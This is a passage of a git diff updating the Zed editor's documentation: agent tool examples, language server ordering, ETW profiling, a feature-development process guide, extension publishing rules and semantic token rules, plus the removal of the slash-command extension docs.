Used for the terminal assistant feature. - -> **Note:** Be sure you want to override these, as you'll miss out on iteration on our built-in features. -> This should be primarily used when developing Zed. - -You can customize these templates to better suit your needs while maintaining the core structure and variables used by Zed. -Zed will automatically reload your prompt overrides when they change on disk. - -Consult Zed's [assets/prompts](https://github.com/zed-industries/zed/tree/main/assets/prompts) directory for current versions you can play with. - -### History {#history} - -After you submit your first message in a text thread, a name for your context is generated by the language model, and the context is automatically saved to your file system in - -- `~/.config/zed/conversations` (macOS) -- `~/.local/share/zed/conversations` (Linux) -- `%LocalAppData%\Zed\conversations` (Windows) - -You can access and load previous contexts by clicking on the history button in the top-left corner of the agent panel. - -![Viewing assistant history](https://zed.dev/img/assistant/assistant-history.png) +See the [Agent Panel documentation](./agent-panel.md) to get started. diff --git a/docs/src/ai/tools.md b/docs/src/ai/tools.md index 66f0af571d70fb8db7add2bd89139bf788369de6..bc57f3c378fbc03429fe84993c349b0a5b3ce0d0 100644 --- a/docs/src/ai/tools.md +++ b/docs/src/ai/tools.md @@ -19,10 +19,14 @@ Gets errors and warnings for either a specific file or the entire project, usefu When a path is provided, shows all diagnostics for that specific file. When no path is provided, shows a summary of error and warning counts for all files in the project. +**Example:** After editing `src/parser.rs`, call `diagnostics` with that path to check for type errors immediately. After a larger refactor touching many files, call it without a path to see a project-wide count of errors before deciding what to fix next. + ### `fetch` Fetches a URL and returns the content as Markdown. Useful for providing docs as context. +**Example:** Fetching a library's changelog page to check whether a breaking API change was introduced in a recent version before writing integration code. + ### `find_path` Quickly finds files by matching glob patterns (like "\*_/_.js"), returning matching file paths alphabetically. @@ -31,6 +35,8 @@ Quickly finds files by matching glob patterns (like "\*_/_.js"), returning match Searches file contents across the project using regular expressions, preferred for finding symbols in code without knowing exact file paths. +**Example:** To find every call site of a function before renaming it, search for `parse_config\(` — the regex matches the function name followed by an opening parenthesis, filtering out comments or variable names that happen to contain the string. + ### `list_directory` Lists files and directories in a given path, providing an overview of filesystem contents. @@ -55,6 +61,8 @@ Allows the Agent to work through problems, brainstorm ideas, or plan without exe Searches the web for information, providing results with snippets and links from relevant web pages, useful for accessing real-time information. +**Example:** Looking up whether a known bug in a dependency has been patched in a recent release, or finding the current API signature for a third-party library when the local docs are out of date. + ## Edit Tools ### `copy_path` @@ -73,6 +81,8 @@ Deletes a file or directory (including contents recursively) at the specified pa Edits files by replacing specific text with new content. +**Example:** Updating a function signature — the agent identifies the exact lines to replace and provides the updated version, leaving the surrounding code untouched. For widespread renames, it pairs this with `grep` to find every occurrence first. + ### `move_path` Moves or renames a file or directory in the project, performing a rename if only the filename differs. @@ -89,8 +99,12 @@ Saves files that have unsaved changes. Used when files need to be saved before f Executes shell commands and returns the combined output, creating a new shell process for each invocation. +**Example:** After editing a Rust file, run `cargo test --package my_crate 2>&1 | tail -30` to confirm the changes don't break existing tests. Or run `git diff --stat` to review which files have been modified before wrapping up a task. + ## Other Tools -### `subagent` +### `spawn_agent` Spawns a subagent with its own context window to perform a delegated task. Useful for running parallel investigations, completing self-contained tasks, or performing research where only the outcome matters. Each subagent has access to the same tools as the parent agent. + +**Example:** While refactoring the authentication module, spawn a subagent to investigate how session tokens are validated elsewhere in the codebase. The parent agent continues its work and reviews the subagent's findings when it completes — keeping both context windows focused on a single task. diff --git a/docs/src/appearance.md b/docs/src/appearance.md index fdf5e239ccf581988e439845d0c2f94e4bb1b95c..1c26d67100379462298c4026dbf578b936b61fb1 100644 --- a/docs/src/appearance.md +++ b/docs/src/appearance.md @@ -15,11 +15,13 @@ Here's how to make Zed feel like home: 1. **Pick a theme**: Press {#kb theme_selector::Toggle} to open the Theme Selector. Arrow through the list to preview themes in real time, and press Enter to apply. -2. **Choose an icon theme**: Run `icon theme selector: toggle` from the command palette to browse icon themes. +2. **Toggle light/dark mode quickly**: Press {#kb theme::ToggleMode}. If you currently use a static `"theme": "..."` value, the first toggle converts it to dynamic mode settings with default themes. -3. **Set your font**: Open the Settings Editor with {#kb zed::OpenSettings} and search for `buffer_font_family`. Set it to your preferred coding font. +3. **Choose an icon theme**: Run `icon theme selector: toggle` from the command palette to browse icon themes. -4. **Adjust font size**: In the same Settings Editor, search for `buffer_font_size` and `ui_font_size` to tweak the editor and interface text sizes. +4. **Set your font**: Open the Settings Editor with {#kb zed::OpenSettings} and search for `buffer_font_family`. Set it to your preferred coding font. + +5. **Adjust font size**: In the same Settings Editor, search for `buffer_font_size` and `ui_font_size` to tweak the editor and interface text sizes. That's it. You now have a personalized Zed setup. diff --git a/docs/src/collaboration/overview.md b/docs/src/collaboration/overview.md index 97efdae088d1692ad5840e23c13bc50d4ecb75c7..1022ec683bf5eefab55b9aff939c568098fdda30 100644 --- a/docs/src/collaboration/overview.md +++ b/docs/src/collaboration/overview.md @@ -24,8 +24,6 @@ See the [Data and Privacy FAQs](https://zed.dev/faq#data-and-privacy) for more d ### Selecting Audio Devices -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - You can select specific input and output audio devices instead of using system defaults. To configure audio devices: 1. Open {#kb zed::OpenSettings} diff --git a/docs/src/completions.md b/docs/src/completions.md index 9962fd5f24c604bb22f73ba5a797de936f9cb0d4..81c2efa3514a4623408b2869325ab0991ce382d6 100644 --- a/docs/src/completions.md +++ b/docs/src/completions.md @@ -8,7 +8,7 @@ description: Zed's code completions from language servers and edit predictions. Zed supports two sources for completions: 1. "Code Completions" provided by Language Servers (LSPs) automatically installed by Zed or via [Zed Language Extensions](languages.md). -2. "Edit Predictions" provided by Zed's own Zeta model or by external providers like [GitHub Copilot](#github-copilot) or [Supermaven](#supermaven). +2. "Edit Predictions" provided by Zed's own Zeta model or by external providers like [GitHub Copilot](#github-copilot). ## Language Server Code Completions {#code-completions} diff --git a/docs/src/configuring-languages.md b/docs/src/configuring-languages.md index 4e9bbce822f2f0d87ac2a8c9617698acd5983243..46a10e80e3807c1dd57df2184e814b2abe8647d7 100644 --- a/docs/src/configuring-languages.md +++ b/docs/src/configuring-languages.md @@ -122,11 +122,40 @@ You can specify your preference using the `language_servers` setting: In this example: -- `intelephense` is set as the primary language server -- `phpactor` is disabled (note the `!` prefix) -- `...` expands to the rest of the language servers that are registered for PHP +- `intelephense` is set as the primary language server. +- `phpactor` and `phptools` are disabled (note the `!` prefix). +- `"..."` expands to the rest of the language servers registered for PHP that are not already listed. -This configuration allows you to tailor the language server setup to your specific needs, ensuring that you get the most suitable functionality for your development workflow. +The `"..."` entry acts as a wildcard that includes any registered language server you haven't explicitly mentioned. Servers you list by name keep their position, and `"..."` fills in the remaining ones at that point in the list. Servers prefixed with `!` are excluded entirely. This means that if a new language server extension is installed or a new server is registered for a language, `"..."` will automatically include it. If you want full control over which servers are enabled, omit `"..."` — only the servers you list by name will be used. + +#### Examples + +Suppose you're working with Ruby. The default configuration is: + +```json [settings] +{ + "language_servers": [ + "solargraph", + "!ruby-lsp", + "!rubocop", + "!sorbet", + "!steep", + "!kanayago", + "..." + ] +} +``` + +When you override `language_servers` in your settings, your list **replaces** the default entirely. This means default-disabled servers like `kanayago` will be re-enabled by `"..."` unless you explicitly disable them again. + +| Configuration | Result | +| ------------------------------------------------- | ------------------------------------------------------------------ | +| `["..."]` | `solargraph`, `ruby-lsp`, `rubocop`, `sorbet`, `steep`, `kanayago` | +| `["ruby-lsp", "..."]` | `ruby-lsp`, `solargraph`, `rubocop`, `sorbet`, `steep`, `kanayago` | +| `["ruby-lsp", "!solargraph", "!kanayago", "..."]` | `ruby-lsp`, `rubocop`, `sorbet`, `steep` | +| `["ruby-lsp", "solargraph"]` | `ruby-lsp`, `solargraph` | + +> Note: In the first example, `"..."` includes `kanayago` even though it is disabled by default. The override replaced the default list, so the `"!kanayago"` entry is no longer present. To keep it disabled, you must include `"!kanayago"` in your configuration. ### Toolchains @@ -136,8 +165,6 @@ Not all languages in Zed support toolchain discovery and selection, but for thos ### Configuring Language Servers -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When configuring language servers in your `settings.json`, autocomplete suggestions include all available LSP adapters recognized by Zed, not only those currently active for loaded languages. This helps you discover and configure language servers before opening files that use them. Many language servers accept custom configuration options. You can set these in the `lsp` section of your `settings.json`: @@ -324,6 +351,18 @@ To run linter fixes automatically on save: } ``` +### Formatting Selections + +Zed supports formatting only the selected text via `editor: format selections` ({#kb editor::FormatSelections}). How +this works depends on the configured formatter: + +- **Language server**: Sends an LSP range formatting request for each selection. This provides the most precise + selection-only formatting. +- **Prettier**: Uses Prettier's built-in range formatting to format the encompassing range of all selections. Any + resulting edits that fall outside the selected ranges are discarded, so only the selected code is modified. +- **External commands**: External command formatters do not support range formatting and are skipped when formatting + selections. + ### Integrating Formatting and Linting Zed allows you to run both formatting and linting on save. Here's an example that uses Prettier for formatting and ESLint for linting JavaScript files: diff --git a/docs/src/configuring-zed.md b/docs/src/configuring-zed.md index ec775964dfd35ad019a37ad58ffe42bc03c645c1..b2a8c1e88a4abbead7afe4978abd110880f1fae2 100644 --- a/docs/src/configuring-zed.md +++ b/docs/src/configuring-zed.md @@ -69,6 +69,10 @@ Settings are applied in layers: Later layers override earlier ones. For object settings (like `terminal`), properties merge rather than replace entirely. +## Per-file Settings + +Zed has some compatibility support for Emacs and Vim [modelines](./modelines.md), so you can set some settings per-file. + ## Per-Release Channel Overrides Use different settings for Stable, Preview, or Nightly builds by adding top-level channel keys: diff --git a/docs/src/debugger.md b/docs/src/debugger.md index c659c1410b38166cf11da0af728e18f8c9282054..bf05de0f6ccccff4e95fd622bab7130d655a1167 100644 --- a/docs/src/debugger.md +++ b/docs/src/debugger.md @@ -165,8 +165,6 @@ The debug adapter will then stop whenever an exception of a given kind occurs. W ## Working with Split Panes -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When debugging with multiple split panes open, Zed shows the active debug line in one pane and preserves your layout in others. If you have the same file open in multiple panes, the debugger picks a pane where the file is already the active tab—it won't switch tabs in panes where the file is inactive. Once the debugger picks a pane, it continues using that pane for subsequent breakpoints during the session. If you drag the tab with the active debug line to a different split, the debugger tracks the move and uses the new pane. diff --git a/docs/src/development.md b/docs/src/development.md index d8ea0b3f980317ff1f38a8325534e57f321bd8de..b4c9ea387da020be8d2d0dd517b0c5998bde41e2 100644 --- a/docs/src/development.md +++ b/docs/src/development.md @@ -88,33 +88,27 @@ in-depth examples and explanations. ## ETW Profiling on Windows -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). +Zed supports performance profiling with Event Tracing for Windows (ETW) to capture detailed performance data, including CPU, GPU, memory, disk, and file I/O activity. Data is saved to an `.etl` file, which can be opened in standard profiling tools for analysis. -Zed supports Event Tracing for Windows (ETW) to capture detailed performance data. You can record CPU, GPU, disk I/O, and file I/O activity, with optional heap allocation tracking. +ETW recordings may contain personally identifiable or security-sensitive information, such as paths to files and registry keys accessed, as well as process names. Please keep this in mind when sharing traces with others. ### Recording a trace -Open the command palette and run: +Open the command palette and run one of the following: -- **`etw_tracing: Record Etw Trace`** — Records CPU, GPU, and I/O activity -- **`etw_tracing: Record Etw Trace With Heap Tracing`** — Includes heap allocation data for the Zed process +- `zed: record etw trace`: records CPU, GPU, memory, and I/O activity +- `zed: record etw trace with heap tracing`: includes heap allocation data for the Zed process -Zed prompts you to choose a save location for the `.etl` trace file. +Zed will prompt you to choose a save location for the `.etl` file, then request administrator permission. Once granted, recording will begin. ### Saving or canceling -While recording: +While a trace is recording, open the command palette and run one of the following: -- **`etw_tracing: Save Etw Trace`** — Stops recording and saves the trace to disk -- **`etw_tracing: Cancel Etw Trace`** — Stops recording without saving +- `zed: save etw trace`: stops recording and saves the trace to disk +- `zed: cancel etw trace`: stops recording without saving -Zed buffers trace data in memory. Recordings automatically save after 60 seconds if you don't manually stop them. - -### Analyzing traces - -Open `.etl` files with [Windows Performance Analyzer](https://learn.microsoft.com/en-us/windows-hardware/test/wpt/windows-performance-analyzer) to inspect CPU stacks, GPU usage, disk I/O patterns, and heap allocations. - -**Note for existing keybindings**: The `etw_tracing::StopEtwTrace` action was renamed to `etw_tracing::SaveEtwTrace`. Update any custom keybindings. +Recordings automatically save after 60 seconds if not stopped manually. ## Contributor links diff --git a/docs/src/development/feature-process.md b/docs/src/development/feature-process.md new file mode 100644 index 0000000000000000000000000000000000000000..ec39c6c4b59ef5916d5f5dcfada9abf326f77a3a --- /dev/null +++ b/docs/src/development/feature-process.md @@ -0,0 +1,55 @@ +# Zed's Feature Development Process + +This is for moderate-to-large features — new UI, behavior changes, or work that cuts across multiple parts of Zed. Small keybindings or settings tweaks don't need all of this. + +> **Before you start:** If you're an external contributor, make sure the feature is something the team wants before investing significant effort. Please read the [Contributing Guide](../../../CONTRIBUTING.md) and our [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422) — if there isn't already a GitHub issue with clear staff confirmation, start with a GitHub Discussion. Feature request PRs that skip this process have a _very_ low merge rate. Taking the time to follow our process significantly increases the chances your idea gets picked up and built. + +## 1. Why does this matter? + +Every feature starts as an idea. Before writing any code, ground it: + +- **What problem does this solve?** +- **What's the evidence?** GitHub issues, Discord requests, thumbs-up counts, blog posts. +- **Is there prior art?** If it's in VS Code, JetBrains, Neovim, or a wildly popular plugin, that's a strong signal. If the idea is more novel, name what it's based on — "This is X, adapted for Zed's multi-buffers" is far more useful than "I think this would be cool." + +## 2. What is it? + +Write a short, concrete feature statement, then back it up with the context gathered above. If you can't describe the feature in a few sentences, it might be too big or too vague. + +Here's an example format, though adapt it to whatever your feature needs: + +**Feature:** Inline Git Blame + +**Purpose:** Show the last commit author and message for each line directly after the editor text, so developers can understand code history without opening the git blame. + +**Background:** +This is standard across all major code editors: + +- \[screenshot of VSCode] +- \[screenshot of Intellij] +- \[screenshot of Neovim] +- and has 146 thumbs up on this [github issue](https://github.com). + +**Decisions:** +We have to decide whether to use the git CLI or a git library. Zed uses a git library but its blame implementation is too slow for a code editor, so we should use the CLI's porcelain interface. + +## 3. What else does this affect? + +Walk through this list before you start building. Not everything will apply: + +- **Actions & keybindings.** What actions does your feature define? Do the default keybindings conflict with existing ones? +- **Settings.** Is any behavior configurable? Per-user vs. per-project vs. per-language? Don't forget to add new settings to the Settings UI. +- **Themes & styling.** Does this need a new semantic token? Does it look right in both light and dark mode? +- **Vim mode.** Vim users might have different expectations for this feature. +- **Remote development.** Does your feature work with remote projects? File paths, shell commands, and environment variables all might behave differently. +- **Persistence across restarts.** Should your feature's state persist across restarts? +- **Accessibility.** Is it keyboard-navigable? Are focus states clear? +- **Platform differences.** Does behavior differ on macOS, Linux, or Windows? +- **Performance.** How does it behave with large files or big projects? Are interactions instant? +- **Security.** How does this feature interact with Workspace Trust? Does it open new attack surfaces in Zed? + +If your feature touches the **editor** specifically: the editor has a lot of coexisting features — gutter elements, inline blocks, multiple cursors, folding, edit predictions, code intelligence popovers, the minimap. Test your changes with different combinations of them active. Features that work in a normal buffer might need to be disabled in a multi-buffer. + +## 4. Ship it + +Use this as the basis for your GitHub Discussion, issue, or PR description. Good product research gets everyone aligned on goals, the state of the art, and any tradeoffs we might need to consider. diff --git a/docs/src/development/glossary.md b/docs/src/development/glossary.md index 720c20c3bd42074b3e2b4863b879a54001d27e73..1f6b07840b8c70a86c587c45e7b617b0266144e1 100644 --- a/docs/src/development/glossary.md +++ b/docs/src/development/glossary.md @@ -1,5 +1,5 @@ --- -title: Zed Development: Glossary +title: "Zed Development: Glossary" description: "Guide to zed development: glossary for Zed development." --- @@ -84,16 +84,16 @@ h_flex() - `Panel`: An `Entity` implementing the `Panel` trait. Panels can be placed in a `Dock`. In the image below: `ProjectPanel` is in the left dock, `DebugPanel` is in the bottom dock, and `AgentPanel` is in the right dock. `Editor` does not implement `Panel`. - `Dock`: A UI element similar to a `Pane` that can be opened and hidden. Up to three docks can be open at once: left, right, and bottom. A dock contains one or more `Panel`s, not `Pane`s. -Screenshot for the Pane and Dock features +Screenshot for the Pane and Dock features - `Project`: One or more `Worktree`s - `Worktree`: Represents either local or remote files. -Screenshot for the Worktree feature +Screenshot for the Worktree feature - [Multibuffer](https://zed.dev/docs/multibuffers): A list of Editors, a multi-buffer allows editing multiple files simultaneously. A multi-buffer opens when an operation in Zed returns multiple locations, examples: _search_ or _go to definition_. See project search in the image below. -Screenshot for the MultiBuffer feature +Screenshot for the MultiBuffer feature ## Editor diff --git a/docs/src/development/macos.md b/docs/src/development/macos.md index 62c2218e52751c1117da90e76ae13554b7e8f792..6315ddcab8a554cf0405f8095c5aff98b09d6251 100644 --- a/docs/src/development/macos.md +++ b/docs/src/development/macos.md @@ -89,7 +89,7 @@ Before making any UI changes, generate baseline images from a known-good state: ```sh git checkout origin/main -UPDATE_BASELINE=1 cargo run -p zed --bin visual_test_runner --features visual-tests +UPDATE_BASELINE=1 cargo run -p zed --bin zed_visual_test_runner --features visual-tests git checkout - ``` @@ -118,7 +118,8 @@ xcrun: error: unable to find utility "metal", not a developer tool or in PATH Try `sudo xcode-select --switch /Applications/Xcode.app/Contents/Developer` -If you're on macOS 26, try `xcodebuild -downloadComponent MetalToolchain` +If you're on macOS 26, try `xcodebuild -downloadComponent MetalToolchain`. +If that command fails, run `xcodebuild -runFirstLaunch` and try downloading the toolchain again. ### Cargo errors claiming that a dependency is using unstable features diff --git a/docs/src/extensions.md b/docs/src/extensions.md index 01636894a11781717a837a0f0784d6221ded1c3c..9e46f4ab54e5a22f16a1ef156533d25511c36606 100644 --- a/docs/src/extensions.md +++ b/docs/src/extensions.md @@ -14,6 +14,6 @@ Zed lets you add new functionality using user-defined extensions. - [Developing Debugger Extensions](./extensions/debugger-extensions.md) - [Developing Themes](./extensions/themes.md) - [Developing Icon Themes](./extensions/icon-themes.md) - - [Developing Slash Commands](./extensions/slash-commands.md) + - [Developing Snippets](./extensions/snippets.md) - [Developing Agent Servers](./extensions/agent-servers.md) - [Developing MCP Servers](./extensions/mcp-extensions.md) diff --git a/docs/src/extensions/developing-extensions.md b/docs/src/extensions/developing-extensions.md index 84e57df49fca95adb6c5c4fb5d9aad3b8c771383..01c16dc62be8b9be7e576bc1be10f20437acc993 100644 --- a/docs/src/extensions/developing-extensions.md +++ b/docs/src/extensions/developing-extensions.md @@ -1,11 +1,11 @@ --- title: Developing Extensions -description: "Create Zed extensions: languages, themes, debuggers, slash commands, and more." +description: "Create Zed extensions: languages, themes, debuggers, and more." --- # Developing Extensions {#developing-extensions} -Zed extensions are Git repositories containing an `extension.toml` manifest. They can provide languages, themes, debuggers, slash commands, and MCP servers. +Zed extensions are Git repositories containing an `extension.toml` manifest. They can provide languages, themes, debuggers, snippets, and MCP servers. ## Extension Features {#extension-features} @@ -15,7 +15,7 @@ Extensions can provide: - [Debuggers](./debugger-extensions.md) - [Themes](./themes.md) - [Icon Themes](./icon-themes.md) -- [Slash Commands](./slash-commands.md) +- [Snippets](./snippets.md) - [MCP Servers](./mcp-extensions.md) ## Developing an Extension Locally @@ -47,8 +47,6 @@ description = "Example extension" repository = "https://github.com/your-name/my-zed-extension" ``` -> **Note:** If you are working on a theme extension with the intent to publish it later, suffix your theme extension ID with `-theme`. Otherwise, this may be raised during [extension publishing](#publishing-your-extension). - In addition to this, there are several other optional files and directories that can be used to add functionality to a Zed extension. An example directory structure of an extension that provides all capabilities is as follows: ``` @@ -63,6 +61,9 @@ my-extension/ highlights.scm themes/ my-theme.json + snippets/ + snippets.json + rust.json ``` ## WebAssembly @@ -126,9 +127,11 @@ The following licenses are accepted: - [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0) - [BSD 2-Clause](https://opensource.org/license/bsd-2-clause) - [BSD 3-Clause](https://opensource.org/license/bsd-3-clause) +- [CC BY 4.0](https://creativecommons.org/licenses/by/4.0) - [GNU GPLv3](https://www.gnu.org/licenses/gpl-3.0.en.html) - [GNU LGPLv3](https://www.gnu.org/licenses/lgpl-3.0.en.html) - [MIT](https://opensource.org/license/mit) +- [Unlicense](https://unlicense.org) - [zlib](https://opensource.org/license/zlib) This allows us to distribute the resulting binary produced from your extension code to our users. @@ -138,7 +141,24 @@ Your license file should be at the root of your extension repository. Any filena > This license requirement applies only to your extension code itself (the code that gets compiled into the extension binary). > It does not apply to any tools your extension may download or interact with, such as language servers or other external dependencies. -> If your repository contains both extension code and other projects (like a language server), you are not required to relicense those other projects—only the extension code needs to be one of the aforementioned accepted licenses. +> If your repository contains both extension code and other projects (like a language server), you are not required to relicense those other projects — only the extension code needs to be one of the aforementioned accepted licenses. + +## Extension Publishing Prerequisites + +Before publishing your extension, make sure that you have chosen a unique extension ID for your extension in the [extension manifest](#directory-structure-of-a-zed-extension). +This will be the primary identifier for your extension and cannot be changed after your extension has been published. +Also, ensure that you have filled out all the required fields in the manifest. + +Furthermore, please make sure that your extension fulfills the following preconditions before you move on to publishing your extension: + +- Extension IDs and names must not contain the words `zed`, `Zed` or `extension`, since they are all Zed extensions. +- Your extension ID should provide some information on what your extension tries to accomplish. E.g. for themes, it should be suffixed with `-theme`, snippet extensions should be suffixed with `-snippets` and so on. An exception to that rule are extension that provide support for languages or popular tooling that people would expect to find under that ID. You can take a look at the list of [existing extensions](https://github.com/zed-industries/extensions/blob/main/extensions.toml) to get a grasp on how this usually is enforced. +- Extensions should provide something that is not yet available in the marketplace as opposed to fixing something that could be resolved within an existing extension. For example, if you find that an existing extension's support for a language server is not functioning properly, first try contributing a fix to the existing extension as opposed to submitting a new extension immediately. + - If you receive no response or reaction within the upstream repository within a reasonable amount of time, feel free to submit a pull request that aims to fix said issue. Please ensure that you provide your previous efforts within the pull request to the extensions repository for adding your extension. Zed maintainers will then decide on how to proceed on a case by case basis. +- Extensions that intend to provide a language, debugger or MCP server must not ship the language server as part of the extension. Instead, the extension should either download the language server or check for the availability of the language server in the users environment using the APIs as provided by the [Zed Rust Extension API](https://docs.rs/zed_extension_api/latest/zed_extension_api/). +- Themes and icon themes should not be published as part of extensions that provide other features, e.g. language support. Instead, they should be published as a distinct extension. This also applies to theme and icon themes living in the same repository. + +Note that non-compliance will be raised during the publishing process by reviewers and delay the release of your extension. ## Publishing your extension @@ -146,11 +166,11 @@ To publish an extension, open a PR to [the `zed-industries/extensions` repo](htt In your PR, do the following: -1. Add your extension as a Git submodule within the `extensions/` directory +1. Add your extension as a Git submodule within the `extensions/` directory under the `extensions/{extension-id}` path ```sh -git submodule add https://github.com/your-username/foobar-zed.git extensions/foobar -git add extensions/foobar +git submodule add https://github.com/your-username/foobar-zed.git extensions/my-extension +git add extensions/my-extension ``` > All extension submodules must use HTTPS URLs and not SSH URLS (`git@github.com`). @@ -163,14 +183,21 @@ submodule = "extensions/my-extension" version = "0.0.1" ``` -> If your extension is in a subdirectory within the submodule you can use the `path` field to point to where the extension resides. +If your extension is in a subdirectory within the submodule, you can use the `path` field to point to where the extension resides: + +```toml +[my-extension] +submodule = "extensions-my-extension" +path = "packages/zed" +version = "0.0.1" +``` + +> Note that the [required extension license](#extension-license-requirements) must reside at the specified path, a license at the root of the repository will not work. However, you are free to symlink an existing license within the repository or choose an alternative license from the list of accepted licenses for the extension code. 3. Run `pnpm sort-extensions` to ensure `extensions.toml` and `.gitmodules` are sorted Once your PR is merged, the extension will be packaged and published to the Zed extension registry. -> Extension IDs and names should not contain `zed` or `Zed`, since they are all Zed extensions. - ## Updating an extension To update an extension, open a PR to [the `zed-industries/extensions` repo](https://github.com/zed-industries/extensions). diff --git a/docs/src/extensions/languages.md b/docs/src/extensions/languages.md index 3e748e4b33e51e2dcd08175b793d97ea0ddda2d8..121357306e73552140f938197ffc466c0e489484 100644 --- a/docs/src/extensions/languages.md +++ b/docs/src/extensions/languages.md @@ -52,7 +52,7 @@ TBD: Document `language_name/config.toml` keys ## Grammar -Zed uses the [Tree-sitter](https://tree-sitter.github.io) parsing library to provide built-in language-specific features. There are grammars available for many languages, and you can also [develop your own grammar](https://tree-sitter.github.io/tree-sitter/creating-parsers#writing-the-grammar). A growing list of Zed features are built using pattern matching over syntax trees with Tree-sitter queries. As mentioned above, every language that is defined in an extension must specify the name of a Tree-sitter grammar that is used for parsing. These grammars are then registered separately in extensions' `extension.toml` file, like this: +Zed uses the [Tree-sitter](https://tree-sitter.github.io) parsing library to provide built-in language-specific features. There are grammars available for many languages, and you can also [develop your own grammar](https://tree-sitter.github.io/tree-sitter/creating-parsers/3-writing-the-grammar.html). A growing list of Zed features are built using pattern matching over syntax trees with Tree-sitter queries. As mentioned above, every language that is defined in an extension must specify the name of a Tree-sitter grammar that is used for parsing. These grammars are then registered separately in extensions' `extension.toml` file, like this: ```toml [grammars.gleam] @@ -143,6 +143,21 @@ This query marks strings, object keys, and numbers for highlighting. The followi | @variable.parameter | Captures function/method parameters | | @variant | Captures variants | +#### Fallback captures + +A single Tree-sitter pattern can specify multiple captures on the same node to define fallback highlights. +Zed resolves them right-to-left: It first tries the rightmost capture, and if the current theme has no style for it, falls back to the next capture to the left, and so on. + +For example: + +```scheme +(type_identifier) @type @variable +``` + +Here Zed will first try to resolve `@variable` from the theme. If the theme defines a style for `@variable`, that style is used. Otherwise, Zed falls back to `@type`. + +This is useful when a language wants to provide a preferred highlight that not all themes may support, while still falling back to a more common capture that most themes define. + ### Bracket matching The `brackets.scm` file defines matching brackets. @@ -434,6 +449,40 @@ The `semantic_tokens` setting accepts the following values: - `"combined"`: Use LSP semantic tokens together with tree-sitter highlighting. - `"full"`: Use LSP semantic tokens exclusively, replacing tree-sitter highlighting. +#### Extension-Provided Semantic Token Rules + +Language extensions can ship default semantic token rules for their language server's custom token types. To do this, place a `semantic_token_rules.json` file in the language directory alongside `config.toml`: + +``` +my-extension/ + languages/ + my-language/ + config.toml + highlights.scm + semantic_token_rules.json +``` + +The file uses the same format as the `semantic_token_rules` array in user settings — a JSON array of rule objects: + +```json +[ + { + "token_type": "lifetime", + "style": ["lifetime"] + }, + { + "token_type": "builtinType", + "style": ["type"] + }, + { + "token_type": "selfKeyword", + "style": ["variable.special"] + } +] +``` + +This is useful when a language server reports custom (non-standard) semantic token types that aren't covered by Zed's built-in default rules. Extension-provided rules act as sensible defaults for that language — users can always override them via `semantic_token_rules` in their settings file, and built-in default rules are only used when neither user nor extension rules match. + #### Customizing Semantic Token Styles Zed supports customizing the styles used for semantic tokens. You can define rules in your settings file, which customize how semantic tokens get mapped to styles in your theme. @@ -463,7 +512,13 @@ Zed supports customizing the styles used for semantic tokens. You can define rul } ``` -All rules that match a given `token_type` and `token_modifiers` are applied. Earlier rules take precedence. If no rules match, the token is not highlighted. User-defined rules take priority over the default rules. +All rules that match a given `token_type` and `token_modifiers` are applied. Earlier rules take precedence. If no rules match, the token is not highlighted. + +Rules are applied in the following priority order (highest to lowest): + +1. **User settings** — rules from `semantic_token_rules` in your settings file. +2. **Extension rules** — rules from `semantic_token_rules.json` in extension language directories. +3. **Default rules** — Zed's built-in rules for standard LSP token types. Each rule in the `semantic_token_rules` array is defined as follows: diff --git a/docs/src/extensions/slash-commands.md b/docs/src/extensions/slash-commands.md index 432af3bd61704eeeeed103b2d86badef662d7a44..a76852189301e7dbfe1a31af6a7743fe4215c4c6 100644 --- a/docs/src/extensions/slash-commands.md +++ b/docs/src/extensions/slash-commands.md @@ -1,143 +1,11 @@ --- -title: Slash Commands -description: "Slash Commands for Zed extensions." +title: Slash Commands (Removed) +description: Extension slash commands have been removed from Zed. +redirect_to: ./mcp-extensions.md --- # Slash Commands -Extensions may provide slash commands for use in the Assistant. +Extension-provided slash commands have been removed from Zed. -## Example extension - -To see a working example of an extension that provides slash commands, check out the [`slash-commands-example` extension](https://github.com/zed-industries/zed/tree/main/extensions/slash-commands-example). - -This extension can be [installed as a dev extension](./developing-extensions.md#developing-an-extension-locally) if you want to try it out for yourself. - -## Defining slash commands - -A given extension may provide one or more slash commands. Each slash command must be registered in the `extension.toml`. - -For example, here is an extension that provides two slash commands: `/echo` and `/pick-one`: - -```toml -[slash_commands.echo] -description = "echoes the provided input" -requires_argument = true - -[slash_commands.pick-one] -description = "pick one of three options" -requires_argument = true -``` - -Each slash command may define the following properties: - -- `description`: A description of the slash command that will be shown when completing available commands. -- `requires_argument`: Indicates whether a slash command requires at least one argument to run. - -## Implementing slash command behavior - -To implement behavior for your slash commands, implement `run_slash_command` for your extension. - -This method accepts the slash command that will be run, the list of arguments passed to it, and an optional `Worktree`. - -This method returns `SlashCommandOutput`, which contains the textual output of the command in the `text` field. The output may also define `SlashCommandOutputSection`s that contain ranges into the output. These sections are then rendered as creases in the Assistant's context editor. - -Your extension should `match` on the command name (without the leading `/`) and then execute behavior accordingly: - -```rs -impl zed::Extension for MyExtension { - fn run_slash_command( - &self, - command: SlashCommand, - args: Vec, - _worktree: Option<&Worktree>, - ) -> Result { - match command.name.as_str() { - "echo" => { - if args.is_empty() { - return Err("nothing to echo".to_string()); - } - - let text = args.join(" "); - - Ok(SlashCommandOutput { - sections: vec![SlashCommandOutputSection { - range: (0..text.len()).into(), - label: "Echo".to_string(), - }], - text, - }) - } - "pick-one" => { - let Some(selection) = args.first() else { - return Err("no option selected".to_string()); - }; - - match selection.as_str() { - "option-1" | "option-2" | "option-3" => {} - invalid_option => { - return Err(format!("{invalid_option} is not a valid option")); - } - } - - let text = format!("You chose {selection}."); - - Ok(SlashCommandOutput { - sections: vec![SlashCommandOutputSection { - range: (0..text.len()).into(), - label: format!("Pick One: {selection}"), - }], - text, - }) - } - command => Err(format!("unknown slash command: \"{command}\"")), - } - } -} -``` - -## Auto-completing slash command arguments - -For slash commands that have arguments, you may also choose to implement `complete_slash_command_argument` to provide completions for your slash commands. - -This method accepts the slash command that will be run and the list of arguments passed to it. It returns a list of `SlashCommandArgumentCompletion`s that will be shown in the completion menu. - -A `SlashCommandArgumentCompletion` consists of the following properties: - -- `label`: The label that will be shown in the completion menu. -- `new_text`: The text that will be inserted when the completion is accepted. -- `run_command`: Whether the 